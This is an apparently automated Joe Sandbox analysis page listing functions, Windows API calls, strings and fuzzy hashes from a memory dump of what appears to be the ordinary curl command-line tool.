Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$mallocstrncmpstrncpy
String ID: \\?\$|<>"?*
API String ID: 2141947759-3264285191
Opcode ID: 57543c61c7e69f5b62e119c87d44c51305eb559e7bdb8557616653a1ad690780
Instruction ID: 3c3b8494aa0e39e4794c2d956cf3ff5b4af4c2f1a6376b6c0a27538ffa68ce96
Opcode Fuzzy Hash: 57543c61c7e69f5b62e119c87d44c51305eb559e7bdb8557616653a1ad690780
Instruction Fuzzy Hash: D7513931A047459FEB758B24C894FEE7BE1AF61340F24806DDC439BA92DB748D80C790

Function 000D5247 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 160stringCOMMON

Download Yara Rule

APIs

strspn.API-MS-WIN-CRT-STRING-L1-1-0(00000005,0123456789abcdefABCDEF:.,00000000,00000000,?), ref: 000D5295
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,001228BC,00000002), ref: 000D52C7
inet_pton.WS2_32(00000017,00000005,?), ref: 000D535F
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000004, /:#?!@,00000000,00000000,?), ref: 000D53D3

Strings

/:#?!@, xrefs: 000D53CD
0123456789abcdefABCDEF:., xrefs: 000D528F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: inet_ptonstrcspnstrncmpstrspn
String ID: /:#?!@$0123456789abcdefABCDEF:.
API String ID: 3548342379-4134865206
Opcode ID: fb40f58db395c2e7d053a5941a534f6bf23bc707d38c5ccac2c45c88647bfc51
Instruction ID: a33e6d3879179aa41e80f988b6487ca0c16ccee7e3813413b2bb04cb5a4835a6
Opcode Fuzzy Hash: fb40f58db395c2e7d053a5941a534f6bf23bc707d38c5ccac2c45c88647bfc51
Instruction Fuzzy Hash: A4511531904B459FDF24CF68DC407BD7BE5AF56382F24046BD881E7382E7A0AA468770

Function 000FDB2C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000FDB47
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDBC4
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDBE8

Part of subcall function 0010C864: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000FDB17), ref: 0010C885

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDC0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDC25

Strings

Wildcard - Parsing started, xrefs: 000FDCA0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$calloc$_strrchr
String ID: Wildcard - Parsing started
API String ID: 3895608051-2475583933
Opcode ID: ff84384e2c6eca7caec2072c7653ad5088b02d2eaa0f9c8ed0c200cdde10c63f
Instruction ID: 9311c6c4c554fa90d6e07b04cd3472206fece049e8efb918a95e3992ea06a824
Opcode Fuzzy Hash: ff84384e2c6eca7caec2072c7653ad5088b02d2eaa0f9c8ed0c200cdde10c63f
Instruction Fuzzy Hash: 6A41B231704A1AEFD7289F64EC447A9BBE6FF44710F10402BD61997B91DBB06C81DB91

Function 000C3460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C347F
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00116C58), ref: 000C348D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C35C2

Strings

%s, xrefs: 000C34C2, 000C35A4
%s, xrefs: 000C34DF, 000C34EE, 000C3520, 000C3554, 000C3584
Failed to open %s to write libcurl code!, xrefs: 000C34A0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: %s$%s$Failed to open %s to write libcurl code!
API String ID: 4110152555-3591596397
Opcode ID: 6744e3ae5df159f690bd6da1f9052a8eab0b985d52413476a23408c984ca14b9
Instruction ID: 62ba26fe0c8fe75896b666a1c821e0e1d48cc8ec51bfd5afc5aa68ab8118fa28
Opcode Fuzzy Hash: 6744e3ae5df159f690bd6da1f9052a8eab0b985d52413476a23408c984ca14b9
Instruction Fuzzy Hash: 5E412B71118F01ABD7165B18AC02F9EB3B9AF51314B24802DF91467342D771FFA2C6A5

Function 000C7A54 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7A80
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7A9C

Strings

o, xrefs: 000C7B0E
output file name has no length, xrefs: 000C8209

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree
String ID: o$output file name has no length
API String ID: 1865132094-237255669
Opcode ID: 0889391cce9534ff6a2a0cca6dcf05c4eb2f58693fecca9a65ebc29a5d988de3
Instruction ID: a716ad96103ed0b604ad330a72785612e081dd0103a0ed15200a9eda66d93801
Opcode Fuzzy Hash: 0889391cce9534ff6a2a0cca6dcf05c4eb2f58693fecca9a65ebc29a5d988de3
Instruction Fuzzy Hash: C341B675608742DFC3A5CF349844FAEB7E1AF99314F188A1DE4A9C7280DB30DC819B45

Function 000EAF15 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 000EB02A

Strings

necessary data rewind wasn't possible, xrefs: 000EB038
seek callback returned error %d, xrefs: 000EAFAE
the ioctl callback returned %d, xrefs: 000EAFFA
ioctl callback returned error %d, xrefs: 000EB00D
Cannot rewind mime/post data, xrefs: 000EB048

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fseek
String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
API String ID: 623662203-539828175
Opcode ID: bf09a7351a4ec8798a9267dcfc9e1af7595cd24c00e90ce05ec94d0640ba5579
Instruction ID: 7958066c932c4c514634bb3a15ba039a9dee8a93d9e121608dd20459c9b34120
Opcode Fuzzy Hash: bf09a7351a4ec8798a9267dcfc9e1af7595cd24c00e90ce05ec94d0640ba5579
Instruction Fuzzy Hash: A7310431701642AFC7385B319CD5AFBB7A6FF41364F040226F82967291DB616C10DAE1

Function 000CD77A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000CD7AC
___from_strstr_to_strchr.LIBCMT ref: 000CD7B7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000CD8B0

Strings

Enter %s password for user '%s' on URL #%zu:, xrefs: 000CD85B
Enter %s password for user '%s':, xrefs: 000CD836
%s:%s, xrefs: 000CD897

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$free
String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
API String ID: 3654317688-2337704101
Opcode ID: 2476553d3d653c1f7e6946b1cd5120cf3e2b8bf02d605bba276bde25d4d2f331
Instruction ID: 158e336d781fc4954db3efb758b2d1c8d6d8251e12e916e14c9a89427cf87a11
Opcode Fuzzy Hash: 2476553d3d653c1f7e6946b1cd5120cf3e2b8bf02d605bba276bde25d4d2f331
Instruction Fuzzy Hash: 50319371E0121AAEEB629B64DC41FD9BBF5AF18300F1040FAE548A7143DB719A94CF50

Function 000C9CAA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000C9CB9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000C9CCD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9D63
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9D74

Strings

out of memory, xrefs: 000C9CDC
Got more output options than URLs, xrefs: 000C9D9F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup
String ID: Got more output options than URLs$out of memory
API String ID: 2653869212-1666425204
Opcode ID: bbb0957de0dd577f4f2152649a2288975f1afa084fa3246a88a8a6050c704d9a
Instruction ID: a3404eba8e59950ea475e32cc3a20ff47acb6476f71be5d7962fb3aa74d73f93
Opcode Fuzzy Hash: bbb0957de0dd577f4f2152649a2288975f1afa084fa3246a88a8a6050c704d9a
Instruction Fuzzy Hash: 90316E726047459FDB159F24D889FDC7BF1BB44325F2840BEE8099F292DB749881CB50

Function 000E1AEE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,74F81980,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1AF5
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B03
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B11

Part of subcall function 000E7EC3: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000E7F33

Strings

v, xrefs: 000E1CC0
<, xrefs: 000E1BC2
`, xrefs: 000E1CAA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func$free
String ID: <$`$v
API String ID: 1664282339-4007386528
Opcode ID: 928f17569a852a3d83e994706217273556e407edd147e67d6d61a8de564fe229
Instruction ID: 76ab3cfe6a9ce22d7c433990b5a44fa9f41e95e49e522d168643aeb2151c363c
Opcode Fuzzy Hash: 928f17569a852a3d83e994706217273556e407edd147e67d6d61a8de564fe229
Instruction Fuzzy Hash: 4D51C0B0909780CAEB55CF29D8C87C53BA1AF99704F1841BAED4C8F29BD7B91184CF65

Function 000E6806 Relevance: 10.6, APIs: 7, Instructions: 91fileCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000E681E
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20,?,?,00000000), ref: 000E6848
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E686D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6887
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E688F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E68E3
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E68E7

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$fclose$fopenmalloc
String ID:
API String ID: 2597608617-0
Opcode ID: 87f59cd5086f51ea6791c30844e67b27b8aa83cedf12c3ded530d0aa92636c10
Instruction ID: f99375ddb116e65e89d0410ba82e1761658c7f05b2ddd94eb5bad97a63a3c5ef
Opcode Fuzzy Hash: 87f59cd5086f51ea6791c30844e67b27b8aa83cedf12c3ded530d0aa92636c10
Instruction Fuzzy Hash: 5B218636610512DFDB2C1F24FD182BE3BE6EF947A0B24803BE850A77A2CFA05C424690

Function 000C923B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000C9282

Part of subcall function 000CF352: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 000CF58A

_close.API-MS-WIN-CRT-STDIO-L1-1-0(000000FF), ref: 000C930A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9311
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9319

Part of subcall function 000D0B16: _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,000C2077,?,00008501,00000180), ref: 000D0B2D

Strings

Can't open '%s'!, xrefs: 000C92F1
CURLOPT_INFILESIZE_LARGE, xrefs: 000C92BA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func_close_fileno_fstat64_openfree
String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
API String ID: 440421868-219864042
Opcode ID: c5a4b7e09966dfc4f2d5d4ed529d2d26afd5f6228f34f24687aeb15d1f028dac
Instruction ID: d16cd1b3f579a85b65c2151719cce0ed427586a0b57d9cf01943028a9015919c
Opcode Fuzzy Hash: c5a4b7e09966dfc4f2d5d4ed529d2d26afd5f6228f34f24687aeb15d1f028dac
Instruction Fuzzy Hash: A421F332601704AFDB289BA8DD4AFEEB7E5EF48320F10052DF456925D1EB71BC418B14

Function 000DE49E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,?), ref: 000DE4E6
WSAGetLastError.WS2_32 ref: 000DE4F0

Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DE535
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DE53D

Strings

getpeername() failed with errno %d: %s, xrefs: 000DE509
ssrem inet_ntop() failed with errno %d: %s, xrefs: 000DE557

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetpeernamestrncpy
String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1744225859-4047410615
Opcode ID: ff7f04a926c47e6fec17a4b2967518a0c29ef75f2eaa5223f82117d826925ada
Instruction ID: 02c260dd403b7c84ee421bff6e365886ee1f9ad48d71481ac9df21855b3d3fed
Opcode Fuzzy Hash: ff7f04a926c47e6fec17a4b2967518a0c29ef75f2eaa5223f82117d826925ada
Instruction Fuzzy Hash: 6D218472900218AFDB14AB64EC45EEA77BDEB49350F0041ABF909D7241EB705E888FF0

Function 00112537 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,?,001125F8,?,?,0012F464,00000000,?,00112723,00000004,InitializeCriticalSectionEx,0011627C,InitializeCriticalSectionEx,00000000), ref: 001125C7

Strings

api-ms-, xrefs: 00112587

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1e3ec2ee3845ec6677622df3fecae7310d6f785a8b874dcc42f651fd085eafdf
Instruction ID: 1d06216fc67716dea93322e6ac50529dd5103067d791d563b4c15ded9b363cf3
Opcode Fuzzy Hash: 1e3ec2ee3845ec6677622df3fecae7310d6f785a8b874dcc42f651fd085eafdf
Instruction Fuzzy Hash: 7411A331A01620BBDB6B4B689C91BD937A6AF41760F554230F901E72C0D770ED908AD1

Function 000C305C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0(00000000,curl-ca-bundle.crt,00000000,00000104,?,?), ref: 000C30AB
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C30BD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000C30CA
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000C30DD
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 000C30E9

Strings

curl-ca-bundle.crt, xrefs: 000C30A5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree$PathSearch
String ID: curl-ca-bundle.crt
API String ID: 4109318298-694051528
Opcode ID: cb058a6141803f8461b449fe4df1471544514bf472367a3ff9cdd2f197dfda77
Instruction ID: 4153bb347959e777425f04012c1677d169bdfb88c612867add660208912b776c
Opcode Fuzzy Hash: cb058a6141803f8461b449fe4df1471544514bf472367a3ff9cdd2f197dfda77
Instruction Fuzzy Hash: 3A11CE72504708EFDB259FA4EC85FDEB7E8EB89714F1041AEE48193641DBB0AA858A10

Function 000C8E58 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,000C900B), ref: 000C8E64
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000C900B), ref: 000C8E7F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,error initializing curl library,?,000C900B), ref: 000C8ECE

Strings

error initializing curl library, xrefs: 000C8EC0
error initializing curl, xrefs: 000C8ED9
error retrieving curl library information, xrefs: 000C8EB9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfreemalloc
String ID: error initializing curl$error initializing curl library$error retrieving curl library information
API String ID: 2771806388-2118345949
Opcode ID: cac71f0ec9af853df0ccd3b6400b8542cabffa17b71388bacc720cb0134577a0
Instruction ID: ea0f56f67cf45012c60c21b16098cd2ab9f8d2d832f413fc146c8149ab325390
Opcode Fuzzy Hash: cac71f0ec9af853df0ccd3b6400b8542cabffa17b71388bacc720cb0134577a0
Instruction Fuzzy Hash: AF01F975504B01DFD365AB54D909F9FB7F1FF84360B14842EF48697A92DFB0A8808715

Function 000E15C6 Relevance: 10.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E17E1,000C8BF9), ref: 000E15DF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E15FE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E161B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1638
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1655
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1672
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E168F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E16AC

Part of subcall function 000D5D80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D5D9B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c7bd2a417ccccd329270deb276a26e4152c3403f352a27d84b98be6f7fe3966e
Instruction ID: 979600815de8f6d2740f22e78a356c616b21ca140e482f68b5354240cb943a04
Opcode Fuzzy Hash: c7bd2a417ccccd329270deb276a26e4152c3403f352a27d84b98be6f7fe3966e
Instruction Fuzzy Hash: C2219531624926EFE70C5F34EC4899CFBA6FB48311F10822FE42993661CFB428619F95

Function 0010FB62 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 247COMMON

Download Yara Rule

APIs

Part of subcall function 0010ADF2: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 0010AE0A
Part of subcall function 0010ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AE21
